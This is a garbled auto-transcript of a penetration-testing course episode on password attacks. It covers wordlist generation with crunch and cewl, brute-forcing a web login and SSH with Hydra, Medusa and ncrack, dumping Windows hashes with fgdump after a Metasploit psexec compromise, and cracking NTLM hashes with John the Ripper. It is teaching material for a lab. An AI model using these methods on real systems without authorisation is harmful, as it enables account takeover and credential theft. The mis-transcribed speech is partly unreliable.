Hello, everybody. Welcome to the episode number 21 off the RCP course Password attacks. My name is Alejandro Gonna And I'll be your instructor for today's session.
The learning our fugitives as the of the session is to understand the concepts behind this attack and apply to makes to implement this attack. So let's get down to business, shall we?
Bozz, war tax can mean a lot of things. I mean, you can consider several techniques to be a buzz were attacked, but let me just give you two of the main concepts of follower tax or main techniques. One is the offline buzzword talk, which is basically having the password in, you know, maybe encrypted or hashed,
um, and actually trying to brute force that without any contact with the victim and also online possible attack, which is basically just contacting the victim directly to see if your password worked, or maybe try to brute force it to see if they packed the files were actually, you know,
applies to that machine. So for this scenario will be used in this module of the B Web machine. Just buzzwords we can see that will really know the buzzword, which is, you know, the user name is be in the puzzle is bark. Nothing to see here is just for to demonstrate you have this attacks can actually work.
So lame. Let me start by.
Amazing to tools, which is crunch and cool. I'm just typing here crunch
Uh, these two tools I have have many uses, but, you know, I could I think the main usage for that is to create your own war list.
Maybe already know the policy on the machine that it has to include. I don't know. Four letters in three numbers. So what, you just went to create that,
uh, you know, you don't want to use any any already created world list like Rocky, dirty XY, which comes by the fourth ring colleague. But you want to grant your own wordless. That's where crunching and cool comes handy. So let me just start by type in this simple
crunch a tool and just type for four, which is basically, we generate words afford, uh, length.
You know, the size of the world over the bodies were will be four. Uh, you can, you know, change that I mean, maybe you know that you're trying to find out a being number, not a pas work. So you can actually defined the char set. You know, the character setting you want to use. For example,
Let me just go to the location
charset list And I'm telling its numeric say, Well, you know, just generate the thing the same mouth off Bali's. But you know, it's numbers because I want to I want to find out or want to brute force. Ah ping number. That's four digits.
Ah, so maybe you'll really know that the password is, uh, the letters ABC in that order Or maybe the bean ABC are not in that order. But, you know, the only letters that that being can use this ABC and and a number one number, for example, a B C. One.
So I'm telling the foreman on and letters to use and as you can see, it will generate all this. Ah, this could be really cool. For example, you can generate
more tools or more words, for example, just pays that in here,
which is basically telling the same thing. I mean instead of instead for I'm guessing six characters and I'm telling you to use all of all of this, you know, from 0 to 9. And you know the first letters off the alphabet and just telling to put in in that
takes the wordless cold six charts. That's it. I mean, there's no magic in here. And if you if you say that it will, you'll see Ah, bunch off passwords that you know are made off these characters. So that's it.
The cool thing about this is that you can actually put something like, as we already know, that the password again is, um,
for example, tree tree. It's limited black.
it's being the puzzlers Bach, I'm telling you, this will be generated that will generate that. And if I actually just
dives for fun and the world will be in there, I mean,
this is how you know,
customizable, these two can be But another cool fool eyes called cool Tool is cool. Look at me. It's actually you can actually use coal to generate or list from a Web page, so it will go to, like, kind of a spider
mode alley But you know, it will generate wordless. That came from that webpage. For example. Let me just type copping paid this command so used to show you the example in here
and you know he generated Ah,
it would be went to in depth. It means that he went to this page and the next page.
Um, the letter number. The minimum little number length for this is five. Let me.
Well, it's five and the world Liss will be written to this location and the weapons where we went to take all the possible words with a minimum minimum length off five is this one. So if I go in here and cat this weapon h
I'm sorry. These were list just type
You can see that the minimum is five, but it can go higher in number. But, you know, if I go in here and I grab for B, I will not find anything. Why do you think is that?
I told the command to Onley take words that are minimal, have minimal limped off five. So if I change that
you made previous command until it Okay, trees. Fine.
Let me just grabbing that
hope that I can actually great that in. Yet
You can see that the world, because at the end, is actually in here.
And they were being the world. Bach is actually there.
Okay, Box buck and boggy.
So this is a really cool tool. I mean, I do believe that this could pick This could come in handy when you're trying to actually brute force. Allah game page, for example. But yeah, this is all the static. So far. So working. How can we actually use these war list? Well, let's use some online attack techniques first,
For example, we can use hydra, hydra, Hydra King, actually, brute force, Logan pages and basically other bases well, to actually find users.
on impossible a swell. So let me just copy this Atlantic Command so I can explain it to you one by one.
Let me just go to the beginning. Dash l dash capital L. It tells it to
use all this. Oh, but it's included in this world list as a user name. But, you know, let's not waste time on that because we already know that the elf not capital l but But l you know, lower case l eyes be because the user is actually be. And the possible is actually included in this, uh,
What's the appeal here? That's that pee off be bak machine, which I'm just
driving it so you can see it.
um, let's continue. Ah. Http. Post for me, this is the form that I'll be using or the module obvious in it goes to this weapons, which is, you know, be a underscore. Appealed the d
be a piece of the attacks on school one and that GHB
and then until to use the looking all of this
all of you can see in here. Well, maybe, except for this.
But you know, they again. The possible deformed the cookie, they cook itself the security level. All this a ll the stocks, you know, Sq life manager, current team, and ask your life and your current language. All of this I took it from
barf it I mean, I don't really knew. I intercepted the connection, and I saw that whenever I look in Burford was capturing this and the server that the weapon was actually the browser was actually sending that to the word server. So this is how I know how to use all of this.
And, you know, I'm just learning to use in this case,
I cannot use this anymore for the Usery's actually be
and the but Well, you can Actually, I can actually leave it like that. Let me just
that I'm telling you that the invalid or, you know, the fail text is invalid credentials did not. You forgot the password. And that's because if I go here and put test test,
he says involving tradition that you forget your password. And I'm telling you every time that this is this comes. Um
this it means that, but the username password are incorrect. Now, this can launch several several false positives, because at the end, maybe the text didn't came complete. Or maybe it came in a different format. So this guy this concealed, um,
several false positives.
Let's give it its right. Oh,
dash. Except when I wait,
okay? He's lugging in okay. A lot of false positives. I believe what you get the point. This will actually try to look in here to to the webpage. And you can actually, uh, I'm just cutting here because this machine is be back machine is actually really old. It can take a lot off concurrent
Let me just got being phasing here. Maybe I will. Not being here, maybe.
Aah! These tests, the 60. So you can actually see the command, their whole story.
Oh, let me just face it in. In, in, in, in the terminal.
I didn't want to waste in the terminal story, but, you know,
You can also use Medusa instead of Hydra, which we know will achieve the same, um,
gold. You know, it's the same thing. I'm telling that the user is be the puzzle. His route, Um, the foreign, the deny seeing now which is the same. The form data, You know, the luggage and the password is still form the cookie. Everything is the same. You can achieve exact same thing
But I don't want to waste any time in disguise. I already told you the same text in euros are the results. I want to show you that you can actually do the same thing. But for different service is on. Let me show you that by using a different tool. Now I really created Ah. Use her name. She's called Alejandro Pena.
Ah, my local machine. Let me just show it to you.
And he's already in there. Has a release. Shameful password, I believe. But, you know, the point remains Let me just echo here the buzzword
Oops, it was. Replace it. Oh, my God. Okay, there you go.
Um, And if I don't go to these, um
I mean, just type that that this
syntax in here and cracked which again? Same as Medusa. You can't do that. This is what I'm about to do in here, which is basically brute force and sshh service. You can do it as you can do as well on Medusa intern Hydra is the same thing. I'm just trying to show you three different tools to do the same thing. So let me just
put in here and crack. Um, that's really,
uh, you know, local host. Because he's the local host.
But that's you, sir.
Um Well, Handra, Gina
Aah! Dash P, which is the buzzword
capital because I'm gonna introduce,
what I'm about to hit his s S h
You know it will take a while because at the end it will brute force every possible combination.
And he says that he's finished some some seconds from actually close Euro timeouts Europe roof sent one white proof sense one.
did mess up That were list.
I mean, check it out.
but that's the That's the syntax, so I can actually use that. You, sir, All the hand Drew Ginna
in the buzzword list is a stricken sitting here. And you know that the module is sshh
And you can do to, you know, brute force this again. Ah, with, um,
can't we have the service up
service? Sshh, To start
another. Another cool thing that you can use. And actually, this came from from the sisters sees internal guys is f d dump. Um,
and W c, which is basically Windows credential editor. Ah, but every dumb with dump the passwords off the off the user that are actually online on a window service. Let me just create our lived is running so we can go back in here and check the results.
But you know, every dump is an executable. You can using windows.
I have my windows extinguishing here. And, you know, this comes by the fall lover in Carly's. Let me just copy and paste this here to carpet your Webroot,
which is basically a year, you know, Windows, wineries in the Colin x box and just, you know, copy phase the Abadan that excusable, which again is just dump the hashes of the used. The possible rashes hashes off the users that are online on the machine.
Maybe you're trying thio escalated privileges,
So just you Can you You can just that.
So let me just carpeting here and go to my, uh
when those machine here, let me just drag this so you can see it.
now that I have it. Ah, fire up. I could just run it
and he will create. Oh, I didn't tell you what to say. The data. My bad. Sorry.
Go to the download senior year
and just Oh, you're really dumping here so you can see it Created some files. Um,
up in these files, You know, there's some of them are just informational. And this is what we're interested in. It has. It has all the hashes until M hash is, by the way, which is the best under four windows. He has all the intel. Um, hash is so we can
try to put forth. Um you know, uh, this this file itself, we can copy that, or those hash is, um
22 are back to her Carly machine.
Oh, are you know, we can let me just
refresh your memory here, launching this
performing kind of, um, malicious fast attack. I remember These are famous PS except attack from from Maris Ploy.
and no, actually, uh, exploit the Windows machine itself.
show options really quickly set our host on our windows XB
Nothing to see here, folks. I just hacked a machine. And, you know, I can't actually, uh, try to ah, gain. You know, I really gain a shell in here, so I can just go shell
and, you know, surf to this.
let me just get the matter of predator again. I can just serve to to the Windows location, which is basically, um let me just show it to you.
is seen the downloads. Okay, documents in savings.
Okay, let me just get shell.
And what was the path again? I'm really bad with bats
that coming since settings
owned, Which is the user, by the way. My documents downloads.
Okay. Remember the directory city, my duck. You meant
And I can just use the common type
because that's that's kind of the,
equivalent equivalent of cat of the cat command in Windows. Second, just type type
the person here and I can have the hash is in here. That was just a refresher to do you guys to see how it is to catch a windows machine. So I can just, you know, type.
Uh, copy that file in the full on commands. No,
Let me just copy all this
see if this really finished. Okay? It finished. Okay. Told me. Okay. The password is test. Went to tree and the use room is this one so Yeah, all good in that front. So let me just, uh, create here, huh?
Yeah, let me just pay sitting here. So I just have all of this. Let me just eliminate all of this because I'm not interested in any of this information. I'm just interested in this one.
And I saved it. And then, you know,
I already have the word owned. Remember, we already know the buzzword, but, you know, this is the command that that you should you should use for offline, which is what I'm about to do. Right now. Off line parts were cracking. You can use the tool, John. No. I said it was a reference to John the Reaper. Um,
just let let me give you the syntax in here, John
on DI stash for months,
Dash. Dash were list
and basically just point
to to that to the world is we have created from from cool, remember
ducks. What's the word? Ducks words. The 60. And then the file where we actually have work or
what was the five all the way out, boss. And tell him
So we really tell John to use this for mint and to take the words from this world is which is basically we we already know that the password want to treat This is the password that generated thes anti lm hash s o. We just went to execute that.
Okay, that's 12 tree A C c. Is that so? We can see how you know we can perform several types off. Actually. Ah, Bahs were attacks, but I really more dangerous one. I don't want to show you guys because this is just downloaded the application and running. It is
Thio the WC that win this great credential editor.
Let me just go to the web page
and these go these guys created on Execute Herbal again the WC or Windows credential editor, which is basically the same as if you'd done, but it dumps. The bodies were in plain text.
This is kind of amazing for me. The first time I saw this, I would know it blew my mind, so yeah, I don't waste time. Just downloaded an executable and running because that's all it takes. So you can actually see the results from that.
What is the main usage for crunch and cool. Well, you can create your own war list. For example, You can actually get the world is from a webpage by using cool. So this is
to two nice tools. Two years.
Can we actually gained remote control to this attack? Yeah, we can. We can. We can figure out passwords we can Brute force Logan sessions. I mean, yeah, we can definitely gain remote control.
Ah, and this video will learn the concepts of this attack. And we planted something mix to execute this attack, and we saw also. So, how militias this attack can be,
uh, supplemental materials, the hikers playbook again. Nothing new in this in this front.
And, you know, every possible service you can find on Google and YouTube.
And looking forward in an Expedia, we will cover public exploits.
Well, that's it for today, folks. I hope you you're the video and talk to you soon.